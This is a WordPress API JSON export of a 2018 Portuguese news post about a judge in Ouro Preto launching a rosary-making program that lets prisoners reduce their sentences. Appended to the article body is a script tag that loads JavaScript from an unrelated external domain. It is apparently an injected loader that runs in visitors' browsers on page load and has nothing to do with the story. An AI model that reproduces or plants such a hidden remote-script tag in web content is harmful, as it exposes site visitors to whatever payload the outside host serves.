{"id":164304,"date":"2018-06-15T11:32:39","date_gmt":"2018-06-15T14:32:39","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=164304"},"modified":"2019-01-29T11:15:25","modified_gmt":"2019-01-29T13:15:25","slug":"juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html","title":{"rendered":"Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto"},"content":{"rendered":"<p><strong><img loading=\"lazy\" class=\"alignleft wp-image-164305\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/06\/ouropreto_150618G.jpg\" alt=\"ouropreto_150618G\" width=\"250\" height=\"376\" \/>S\u00e3o Paulo (SP) &#8211;<\/strong> A ju\u00edza da Vara Criminal de Ouro Preto (MG), L\u00facia de F\u00e1tima Magalh\u00e3es Albuquerque Silva, implementou o chamado &#8220;Programa Franciscos&#8221;, para os encarcerados da cidade.<\/p>\n<p>O projeto consiste na produ\u00e7\u00e3o de ter\u00e7os dentro das celas. A participa\u00e7\u00e3o no projeto conceder\u00e1 aos detentos redu\u00e7\u00e3o de um dia da pena, ap\u00f3s a produ\u00e7\u00e3o equivalente a tr\u00eas dias de trabalho. Os ter\u00e7os s\u00e3o feitos de forma artesanal, n\u00e3o necessitando o uso de ferramentas.<\/p>\n<p>O \u201cPrograma Franciscos\u201d conta com a parceria da Pastoral Carcer\u00e1ria, o Programa Liberdade e Assist\u00eancia ao Encarcerado (Prolae) e a dire\u00e7\u00e3o do Pres\u00eddio Municipal.<\/p>\n<p>\u201cO que me move \u00e9 a necessidade. Se n\u00e3o tivermos uma iniciativa fica complicado. Incomoda-me muito imaginar que existem mais de 200 entre homens e mulheres presos sem fazer nada, isto \u00e9 absurdo. Eles tamb\u00e9m querem ter uma atividade at\u00e9 para passar o tempo e ajudar a pr\u00f3pria fam\u00edlia. O que vejo nisto tudo \u00e9 somente a necessidade de encontrar atividades para eles. Acho que, se est\u00e1 preso deveria trabalhar, evidentemente de acordo com as aptid\u00f5es da pessoa, mas tem que trabalhar\u201d, explicou a ju\u00edza em entrevista ao jornal Tribuna Livre.<\/p>\n<p><em>Com informa\u00e7\u00f5es do Jornal Tribuna Livre<\/em>:<a href=\"http:\/\/www.jornaltribunalivre.com.br\/\" target=\"_blank\" rel=\"noopener\"> www.jornaltribunalivre.com.br<\/a><br \/>\n<script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Iniciativa<\/p>\n","protected":false},"author":1,"featured_media":193606,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[1170,1249],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Iniciativa\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-15T14:32:39+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-01-29T13:15:25+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/ouropreto_150618G.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/ouropreto_150618G.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/ouropreto_150618G.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html\",\"name\":\"Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#primaryimage\"},\"datePublished\":\"2018-06-15T14:32:39+00:00\",\"dateModified\":\"2019-01-29T13:15:25+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html","og_locale":"pt_BR","og_type":"article","og_title":"Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto - Not\u00edcias - Franciscanos","og_description":"Iniciativa","og_url":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-06-15T14:32:39+00:00","article_modified_time":"2019-01-29T13:15:25+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/ouropreto_150618G.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/ouropreto_150618G.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/06\/ouropreto_150618G.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html","name":"Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#primaryimage"},"datePublished":"2018-06-15T14:32:39+00:00","dateModified":"2019-01-29T13:15:25+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/juiza-lanca-programa-franciscos-para-encarcerados-em-ouro-preto.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Ju\u00edza lan\u00e7a \u201cPrograma Franciscos\u201d para encarcerados em Ouro Preto"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/164304"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=164304"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/164304\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/193606"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=164304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=164304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=164304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}